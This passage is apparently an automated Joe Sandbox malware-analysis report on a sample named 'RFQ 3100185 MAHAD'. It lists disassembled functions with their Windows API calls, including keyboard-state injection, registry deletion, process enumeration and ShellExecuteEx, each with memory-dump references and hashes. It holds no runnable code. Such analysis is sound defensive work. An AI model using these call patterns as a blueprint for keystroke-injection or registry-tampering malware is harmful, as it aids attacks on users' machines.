                                                              • Part of subcall function 007B936C: __itow.LIBCMT ref: 007B93DF
                                                              • Part of subcall function 007CC6F4: _wcscpy.LIBCMT ref: 007CC717
                                                            • _wcstok.LIBCMT ref: 0080184E
                                                            • _wcscpy.LIBCMT ref: 008018DD
                                                            • _memset.LIBCMT ref: 00801910
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                            • String ID: X
                                                            • API String ID: 774024439-3081909835
                                                            • Opcode ID: a206eee01cc31d102495ddc3cbf3f9b5838d0dd9c511f8ced021f615ba329ee3
                                                            • Instruction ID: 3ab8b1fa169bf9123115691bfb138c1e1e757d51a48c07d50fc7044869f35c31
                                                            • Opcode Fuzzy Hash: a206eee01cc31d102495ddc3cbf3f9b5838d0dd9c511f8ced021f615ba329ee3
                                                            • Instruction Fuzzy Hash: D6C15831604344DFC764EF24C989B9AB7E4FF85350F04892DF999972A2DB34E904CB82
                                                            APIs
                                                              • Part of subcall function 007CB34E: GetWindowLongW.USER32(?,000000EB), ref: 007CB35F
                                                            • GetSystemMetrics.USER32(0000000F), ref: 0082016D
                                                            • MoveWindow.USER32(00000003,?,00000000,00000001,00000000,00000000,?,?,?), ref: 0082038D
                                                            • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 008203AB
                                                            • InvalidateRect.USER32(?,00000000,00000001,?), ref: 008203D6
                                                            • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 008203FF
                                                            • ShowWindow.USER32(00000003,00000000), ref: 00820421
                                                            • DefDlgProcW.USER32(?,00000005,?,?), ref: 00820440
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: Window$MessageSend$InvalidateLongMetricsMoveProcRectShowSystem
                                                            • String ID:
                                                            • API String ID: 3356174886-0
                                                            • Opcode ID: 5fb6f01de9a3bdb2754c22fcb940c220ed9e0636de1d98f16838c5379e98f4dd
                                                            • Instruction ID: b2b2f421a1a325993eb6e6f709cce24de1fe499da8826ae1a5da549c457370f9
                                                            • Opcode Fuzzy Hash: 5fb6f01de9a3bdb2754c22fcb940c220ed9e0636de1d98f16838c5379e98f4dd
                                                            • Instruction Fuzzy Hash: 54A1AE3560062AEFDB18CF68D9897ADBBB1FF44704F148115E854EB296D734ADA0CF90
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 196ec45403647516f2b4a09f68df960a1cab7b551d235e3c2910f57837e42af3
                                                            • Instruction ID: fc875cdf5ac7d33401160f572118806f6f9a9e486261ccdd71a395ad18939fcf
                                                            • Opcode Fuzzy Hash: 196ec45403647516f2b4a09f68df960a1cab7b551d235e3c2910f57837e42af3
                                                            • Instruction Fuzzy Hash: 7E7169B0900509FFCB04CF98CC89EAEBB78FF85315F24815DF915AA251C734AA51CBA5
                                                            APIs
                                                            • _memset.LIBCMT ref: 0081225A
                                                            • _memset.LIBCMT ref: 00812323
                                                            • ShellExecuteExW.SHELL32(?), ref: 00812368
                                                              • Part of subcall function 007B936C: __swprintf.LIBCMT ref: 007B93AB
                                                              • Part of subcall function 007B936C: __itow.LIBCMT ref: 007B93DF
                                                              • Part of subcall function 007CC6F4: _wcscpy.LIBCMT ref: 007CC717
                                                            • CloseHandle.KERNEL32(00000000), ref: 0081242F
                                                            • FreeLibrary.KERNEL32(00000000), ref: 0081243E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
                                                            • String ID: @
                                                            • API String ID: 4082843840-2766056989
                                                            • Opcode ID: 011184cb671254425e102c6fc6aab792aeb54ef17fe362463e4d9fc281486e16
                                                            • Instruction ID: efaae6d6edfb72ce20a8557b36c931f3b77dcce474010291a443eadba39afa8c
                                                            • Opcode Fuzzy Hash: 011184cb671254425e102c6fc6aab792aeb54ef17fe362463e4d9fc281486e16
                                                            • Instruction Fuzzy Hash: 42715970A00619DFCB15EFA4C885AAEB7F9FF48310F108459E959AB361DB38AD50CB94
                                                            APIs
                                                            • GetParent.USER32(?), ref: 007F3DE7
                                                            • GetKeyboardState.USER32(?), ref: 007F3DFC
                                                            • SetKeyboardState.USER32(?), ref: 007F3E5D
                                                            • PostMessageW.USER32(?,00000101,00000010,?), ref: 007F3E8B
                                                            • PostMessageW.USER32(?,00000101,00000011,?), ref: 007F3EAA
                                                            • PostMessageW.USER32(?,00000101,00000012,?), ref: 007F3EF0
                                                            • PostMessageW.USER32(?,00000101,0000005B,?), ref: 007F3F13
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: MessagePost$KeyboardState$Parent
                                                            • String ID:
                                                            • API String ID: 87235514-0
                                                            • Opcode ID: 66424dd1888c8675065a7c5bd35b7b93924693cc0e86142a27619d9ef1ec6c4d
                                                            • Instruction ID: bc9e3adb61bec6d6a4b0cce00fba340cdc7bc38676a6b59e06a417b91f22ff1c
                                                            • Opcode Fuzzy Hash: 66424dd1888c8675065a7c5bd35b7b93924693cc0e86142a27619d9ef1ec6c4d
                                                            • Instruction Fuzzy Hash: 0F51B3A0A047D93DFB364734CC45BBA7EA96F46304F084589F2D5969C3D29CAEC8D760
                                                            APIs
                                                            • GetParent.USER32(00000000), ref: 007F3C02
                                                            • GetKeyboardState.USER32(?), ref: 007F3C17
                                                            • SetKeyboardState.USER32(?), ref: 007F3C78
                                                            • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 007F3CA4
                                                            • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 007F3CC1
                                                            • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 007F3D05
                                                            • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 007F3D26
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: MessagePost$KeyboardState$Parent
                                                            • String ID:
                                                            • API String ID: 87235514-0
                                                            • Opcode ID: 477ee3f32d9d9128d3d872f48ebcab8456f6babced80a696fb0a0cff206b3e28
                                                            • Instruction ID: 4b0c5edcc6c5346f12886cd9dd580247861336de6eecee3185a63c39a2efc445
                                                            • Opcode Fuzzy Hash: 477ee3f32d9d9128d3d872f48ebcab8456f6babced80a696fb0a0cff206b3e28
                                                            • Instruction Fuzzy Hash: F55109A06047DD3DFB368374CC55B76BFA96B46300F088489E2D55A6C3D29CEE84E760
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: _wcsncpy$LocalTime
                                                            • String ID:
                                                            • API String ID: 2945705084-0
                                                            • Opcode ID: 7568fd6ef714ee1256c00937e49ae473687ee5ac10ae54e47f1d4d03cd4b0f3c
                                                            • Instruction ID: 4cc45c12dd9af0023ed3c6a593107c46beb9edce773a19868d782b71acaa45c1
                                                            • Opcode Fuzzy Hash: 7568fd6ef714ee1256c00937e49ae473687ee5ac10ae54e47f1d4d03cd4b0f3c
                                                            • Instruction Fuzzy Hash: 6D414366D14218B6DB10EBF4884AADF77BCAF15310F544967E508E3222FA38D615C3B5
                                                            APIs
                                                            • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?), ref: 00813DA1
                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00813DCB
                                                            • FreeLibrary.KERNEL32(00000000), ref: 00813E80
                                                              • Part of subcall function 00813D72: RegCloseKey.ADVAPI32(?), ref: 00813DE8
                                                              • Part of subcall function 00813D72: FreeLibrary.KERNEL32(?), ref: 00813E3A
                                                              • Part of subcall function 00813D72: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00813E5D
                                                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 00813E25
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                            • String ID:
                                                            • API String ID: 395352322-0
                                                            • Opcode ID: ce775460692d94eee86a4c8741e700ce8b7d5afb42a156b4435dcb0c4c0c2cde
                                                            • Instruction ID: 20b8421f0e000866d4a3a1778aa70f25c4441e554841cb2e160a358cd27c2fb5
                                                            • Opcode Fuzzy Hash: ce775460692d94eee86a4c8741e700ce8b7d5afb42a156b4435dcb0c4c0c2cde
                                                            • Instruction Fuzzy Hash: EF31DAB1901219BFDB159F94EC89AFFB7BCFF08310F00456AE512E2150E6749F899BA0
                                                            APIs
                                                            • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00818FE7
                                                            • GetWindowLongW.USER32(0125D218,000000F0), ref: 0081901A
                                                            • GetWindowLongW.USER32(0125D218,000000F0), ref: 0081904F
                                                            • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00819081
                                                            • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 008190AB
                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 008190BC
                                                            • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 008190D6
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: LongWindow$MessageSend
                                                            • String ID:
                                                            • API String ID: 2178440468-0
                                                            • Opcode ID: 4fd1500215774e2b3a6b004bddd0b7da530a4716fa59279f701c5e74f9dbf1d5
                                                            • Instruction ID: 38c52d786d02fc23ea6270dc3cd9b35b289ee2af75e14797f1ef61742d01e14b
                                                            • Opcode Fuzzy Hash: 4fd1500215774e2b3a6b004bddd0b7da530a4716fa59279f701c5e74f9dbf1d5
                                                            • Instruction Fuzzy Hash: CF3123746006149FDB20CF58EC99FA437A9FBAA714F140168F559CB2B2CB71A880DB81
                                                            APIs
                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 007F08F2
                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 007F0918
                                                            • SysAllocString.OLEAUT32(00000000), ref: 007F091B
                                                            • SysAllocString.OLEAUT32(?), ref: 007F0939
                                                            • SysFreeString.OLEAUT32(?), ref: 007F0942
                                                            • StringFromGUID2.OLE32(?,?,00000028), ref: 007F0967
                                                            • SysAllocString.OLEAUT32(?), ref: 007F0975
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                            • String ID:
                                                            • API String ID: 3761583154-0
                                                            • Opcode ID: 26cc194964388547c4cc8e7ae1ec62d192425993df313d6c44a94fd931578044
                                                            • Instruction ID: f9434ae0bd46b152f34b6761cf3f330250601e5f245df9d6523d6457516a11f2
                                                            • Opcode Fuzzy Hash: 26cc194964388547c4cc8e7ae1ec62d192425993df313d6c44a94fd931578044
                                                            • Instruction Fuzzy Hash: 1421977660121DAF9B10DF78DC88DBB73ACFB09360B008525FA15DB352E6B4EC4587A4
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: __wcsnicmp
                                                            • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                            • API String ID: 1038674560-2734436370
                                                            • Opcode ID: ca561b9108fcd7324ee8326a3526c4501b362fc0a38b73eb8143c629d327f456
                                                            • Instruction ID: f2a779c0ba6e531101d1d64239ff85c896cd824ab7e3e769c257fc34faf4aaa7
                                                            • Opcode Fuzzy Hash: ca561b9108fcd7324ee8326a3526c4501b362fc0a38b73eb8143c629d327f456
                                                            • Instruction Fuzzy Hash: 3F217C31204659B7D321A6349C16FBB73A8EF64310F60402AF645D7383E69D9D53C3A5
                                                            APIs
                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 007F09CB
                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 007F09F1
                                                            • SysAllocString.OLEAUT32(00000000), ref: 007F09F4
                                                            • SysAllocString.OLEAUT32 ref: 007F0A15
                                                            • SysFreeString.OLEAUT32 ref: 007F0A1E
                                                            • StringFromGUID2.OLE32(?,?,00000028), ref: 007F0A38
                                                            • SysAllocString.OLEAUT32(?), ref: 007F0A46
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                            • String ID:
                                                            • API String ID: 3761583154-0
                                                            • Opcode ID: f03f2a453fd42b81af6d54a0921eb861bdbd0980c3890fe8d5a1d097f9aa4eb5
                                                            • Instruction ID: e4dec2aa177d7b02fc04ba91da2f88ec7590295a79658bb57334d9c282378565
                                                            • Opcode Fuzzy Hash: f03f2a453fd42b81af6d54a0921eb861bdbd0980c3890fe8d5a1d097f9aa4eb5
                                                            • Instruction Fuzzy Hash: AA213275604208AF9B10DBB8DC89DBAB7EDFF49360740C525FA49CB361E674EC418764
                                                            APIs
                                                              • Part of subcall function 007CD17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 007CD1BA
                                                              • Part of subcall function 007CD17C: GetStockObject.GDI32(00000011), ref: 007CD1CE
                                                              • Part of subcall function 007CD17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 007CD1D8
                                                            • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 0081A32D
                                                            • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0081A33A
                                                            • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0081A345
                                                            • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 0081A354
                                                            • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 0081A360
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$CreateObjectStockWindow
                                                            • String ID: Msctls_Progress32
                                                            • API String ID: 1025951953-3636473452
                                                            • Opcode ID: aacc051cfd9bf14a762d8e884640decbb29a7f49b594d8aa6aeb3137474e4679
                                                            • Instruction ID: db2d8fda5c6e3b958bd01e54916d18ca57e83c5b282e092e644e66f305935a91
                                                            • Opcode Fuzzy Hash: aacc051cfd9bf14a762d8e884640decbb29a7f49b594d8aa6aeb3137474e4679
                                                            • Instruction Fuzzy Hash: 06118BB1150219BEEF159FA4CC86EEB7F6DFF08798F014114BA18A61A0C6729C61DBA4
                                                            APIs
                                                            • GetClientRect.USER32(?,?), ref: 007CCCF6
                                                            • GetWindowRect.USER32(?,?), ref: 007CCD37
                                                            • ScreenToClient.USER32(?,?), ref: 007CCD5F
                                                            • GetClientRect.USER32(?,?), ref: 007CCE8C
                                                            • GetWindowRect.USER32(?,?), ref: 007CCEA5
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: Rect$Client$Window$Screen
                                                            • String ID:
                                                            • API String ID: 1296646539-0
                                                            • Opcode ID: ced7936d8f3f0053f04995076f76ec5b78f49e0e2738d48ba628b0b7005a1219
                                                            • Instruction ID: 890cfa5fe8fc9783a79e8819f4d90aab66d12fb68c4cefe213c83491ceb1dd6d
                                                            • Opcode Fuzzy Hash: ced7936d8f3f0053f04995076f76ec5b78f49e0e2738d48ba628b0b7005a1219
                                                            • Instruction Fuzzy Hash: 69B12779A00649DBDB11CFA8C580BEEBBB1FF08310F14956DEC59EB250DB34A951CB68
                                                            APIs
                                                            • CreateToolhelp32Snapshot.KERNEL32 ref: 00811C18
                                                            • Process32FirstW.KERNEL32(00000000,?), ref: 00811C26
                                                            • __wsplitpath.LIBCMT ref: 00811C54
                                                              • Part of subcall function 007D1DFC: __wsplitpath_helper.LIBCMT ref: 007D1E3C
                                                            • _wcscat.LIBCMT ref: 00811C69
                                                            • Process32NextW.KERNEL32(00000000,?), ref: 00811CDF
                                                            • CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 00811CF1
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
                                                            • String ID:
                                                            • API String ID: 1380811348-0
                                                            • Opcode ID: 43c6cc29c3cdc0e9d4fa62b121ad61f51c0e4411722025cc77552b2503cff29c
                                                            • Instruction ID: 79b17684af25904c5f2ce81d8672ad15e5e90c224f3fca175df19cfe374353b6
                                                            • Opcode Fuzzy Hash: 43c6cc29c3cdc0e9d4fa62b121ad61f51c0e4411722025cc77552b2503cff29c
                                                            • Instruction Fuzzy Hash: A7514BB11043409BD720DF64D889FABB7ECFF88754F00492EF68AD7251EB7499448B92
                                                            APIs
                                                              • Part of subcall function 00813C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00812BB5,?,?), ref: 00813C1D
                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 008130AF
                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 008130EF
                                                            • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00813112
                                                            • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0081313B
                                                            • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0081317E
                                                            • RegCloseKey.ADVAPI32(00000000), ref: 0081318B
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
